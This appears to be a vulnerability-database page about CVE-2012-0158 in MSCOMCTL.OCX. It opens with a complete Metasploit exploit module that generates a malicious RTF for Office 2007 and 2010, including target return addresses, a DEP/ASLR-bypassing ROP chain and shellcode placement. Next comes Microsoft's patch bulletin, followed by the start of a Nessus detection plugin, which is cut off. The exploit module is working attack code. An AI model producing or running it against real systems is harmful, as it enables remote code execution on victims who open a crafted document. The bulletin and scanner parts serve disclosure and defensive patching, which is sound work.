\nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious \nRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited \nin the wild on April 2012. \n \nThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office \n2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \n\"msgr3en.dll\", which will load after office got load, so the malicious file must \nbe loaded through \"File / Open\" to achieve exploitation. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0158' ], \n[ 'OSVDB', '81125' ], \n[ 'BID', '52911' ], \n[ 'MSB', 'MS12-027' ], \n[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ], \n[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500, \n'Space' => 900, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# winword.exe v12.0.4518.1014 (No Service Pack) \n# winword.exe v12.0.6211.1000 (SP1) \n# winword.exe v12.0.6425.1000 (SP2) \n# winword.exe v12.0.6612.1000 (SP3) \n[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Offset' => 270, \n'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45 \n'Rop' => false \n} \n], \n# winword.exe v14.0.6024.1000 (SP1) \n[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll \n'Rop' => true, \n'RopOffset' => 120 \n} \n], \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), \n], self.class) \nend \n \ndef stream(bytes) \nRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\") \nend \n \ndef junk(n=1) \ntmp = [] \nvalue = rand_text(4).unpack(\"L\")[0].to_i \nn.times { tmp << value } \nreturn tmp \nend \n \n# Ikazuchi ROP chain (msgr3en.dll) \n# Credits to Abysssec \n# http://abysssec.com/files/The_Arashi.pdf \ndef create_rop_chain \nrop_gadgets = [ \n0x3F2CB9E0, # POP ECX # RETN \n0x3F10115C, # HeapCreate() IAT = 3F10115C \n# EAX == HeapCreate() Address \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address. \n0x3F39AFCF, # CALL EAX # RETN \n0x00040000, \n0x00010000, \n0x00000000, \n0x3F2CB9E0, # POP ECX # RETN \n0x00008000, # pop 0x00008000 into ECX \n# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap \n0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN \njunk, \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address. \n# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;) \n0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN \n0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero! \n# then we add ESP to the Zero which result in storing ESP into that address, \n# we need ESP address for copying shellcode ( which stores in Stack ), \n# and we have to get it dynamically at run-time, now with my tricky instruction, we have it! \n0x3F2F18CC, # POP EAX # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX \n# makes ECX point to nearly offset of Stack. \n0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN \n0x3F39795E, # POP EDX # RETN \n0x00000024, # pop 0x00000024 into EDX \n# add 0x24 to ECX ( Stack address ) \n0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN \njunk, \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, \n# and the popping it into ESI ! now ESI point where shellcode stores in stack \n0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# makes EDI = Our RWX Heap Address \n0x3F2B0A7C, # XCHG EAX,EDI # RETN 4 \n0x3F2CB9E0, # POP ECX # RETN \njunk, \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# just skip some junks \n0x3F38BEFB, # ADD AL,58 # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent ) \n# Copy shellcode from stack into RWX Heap \n0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN \njunk(2), # pop into edi # pop into esi \n0x3F39AFCF # CALL EAX # RETN \n].flatten.pack(\"V*\") \n \n# To avoid shellcode being corrupted in the stack before ret \nrop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here \nreturn rop_gadgets \n \nend \n \ndef exploit \n \nret_address = stream([target.ret].pack(\"V\")) \n \nif target['Rop'] \nshellcode = stream(create_rop_chain) \nelse \n# To avoid shellcode being corrupted in the stack before ret \nshellcode = stream(make_nops(target['Offset'])) \nshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string) \nshellcode << stream(make_nops(4)) \nend \nshellcode << stream(payload.encoded) \nwhile shellcode.length < 2378 \nshellcode += \"0\" \nend \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\" \ncontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\" \ncontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\" \ncontent << \"{\\\\object\\\\objocx\" \ncontent << \"{\\\\*\\\\objdata\" \ncontent << \"\\n\" \ncontent << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\" \ncontent << \"00000000000000000E0000\" \ncontent << \"\\n\" \ncontent << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\" \ncontent << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\" \ncontent << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\" \ncontent << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\" \ncontent << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\" \ncontent << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\" \ncontent << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\" \ncontent << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\" \ncontent << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\" \ncontent << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\" \ncontent << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\" \ncontent << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\" \ncontent << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\" \ncontent << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\" \ncontent << \"000000000000\" \ncontent << ret_address \ncontent << \"9090909090909090\" \ncontent << shellcode \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000\" \ncontent << \"\\n\" \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112176/ms12_027_mscomctl_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:43:29", "description": "<html><body><p>Resolves a vulnerability in MSCOMCTL.OCX could allow Remote Code Execution. This was released on April 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-027. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201204.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201204.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-027\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-027</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/><br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/983807\" id=\"kb-link-8\">983807 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Analysis Services Service Pack 4 QFE: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983808\" id=\"kb-link-9\">983808 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 GDR: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983809\" id=\"kb-link-10\">983809 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 QFE: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2597112\" id=\"kb-link-11\">2597112 </a> MS12-027: Description of the security update for Microsoft Office 2003 Service Pack 3: April 10, 2012<br/><br/>Known issue in security update 2597112:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598039\" id=\"kb-link-12\">2598039 </a> MS12-027: Description of the security update for Office 2010: April 10, 2012 <br/><br/>Known issue in security update 2598039:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598041\" id=\"kb-link-13\">2598041 </a> MS12-027: Description of the security update for 2007 Microsoft Office system: April 10, 2012<br/><br/>Known issue in security update 2598041:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2641426\" id=\"kb-link-14\">2641426 </a> MS12-027: Description of the security update for Visual Basic 6: April 10, 2012<br/><br/>Known issue in security update 2641426:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2645025\" id=\"kb-link-15\">2645025 </a> MS12-027: Description of the security update for Microsoft BizTalk Server 2002: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2647488\" id=\"kb-link-16\">2647488 </a> MS12-027: Description of the security update for Fox Pro 8.0 Service Pack 1: April 10, 2012<br/><br/>Known issue in security update 2647488:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\"><span class=\"text-base\">Add or Remove Programs</span></strong> item or the <strong class=\"uiterm\"><span class=\"text-base\">Programs and Features</span></strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2647490\" id=\"kb-link-17\">2647490 </a> MS12-027: Description of the security update for Fox Pro 9.0 Service Pack 2: April 10, 2012<br/><br/>Known issue in security update 2647490:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2655547\" id=\"kb-link-18\">2655547 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658674\" id=\"kb-link-19\">2658674 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2002: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2658676\" id=\"kb-link-20\">2658676 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009 R2: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658677\" id=\"kb-link-21\">2658677 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2007: April 10, 2012<br/><br/>Known issue in security update 2658677:<ul class=\"sbody-free_list\"><li>If you uninstall this security update, the version of Mscomctrl.ocx does not roll back to the original version.</li></ul></li></ul></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "mskb", "title": "MS12-027: Vulnerability in MSCOMCTL.OCX could allow Remote Code Execution: April 10, 2012", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-05-23T21:51:36", "id": "KB2664258", "href": "https://support.microsoft.com/en-us/help/2664258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:23:04", "description": "A memory corruption issue exists in Windows common controls, specifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2, MSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of MSCOMCTL.OCX, due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue by convincing a user to view a specially crafted web page, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:microsoft:office", "cpe:/a:microsoft:office_web_components", "cpe:/a:microsoft:sql_server", "cpe:/a:microsoft:visual_basic", "cpe:/a:microsoft:visual_foxpro", "cpe:/a:microsoft:biztalk_server", "cpe:/a:microsoft:commerce_server"], "id": "SMB_NT_MS12-027.NASL", "href": "https://www.tenable.com/plugins/nessus/58659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58659);\n script_version(\"1.38\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0158\");\n script_bugtraq_id(52911);\n script_xref(name:\"EDB-ID\", value:\"18780\");\n script_xref(name:\"MSFT\", value:\"MS12-027\");\n script_xref(name:\"MSKB\", value:\"983807\");\n script_xref(name:\"MSKB\", value:\"983808\");\n script_xref(name:\"MSKB\", value:\"983809\");\n script_xref(name:\"MSKB\", value:\"2597112\");\n script_xref(name:\"MSKB\", value:\"2598039\");\n script_xref(name:\"MSKB\", value:\"2598041\");\n script_xref(name:\"MSKB\", value:\"2641426\");\n script_xref(name:\"MSKB\", value:\"2645025\");\n script_xref(name:\"MSKB\", value:\"2647488\");\n script_xref(name:\"MSKB\", value:\"2647490\");\n script_xref(name:\"MSKB\", value:\"2655547\");\n 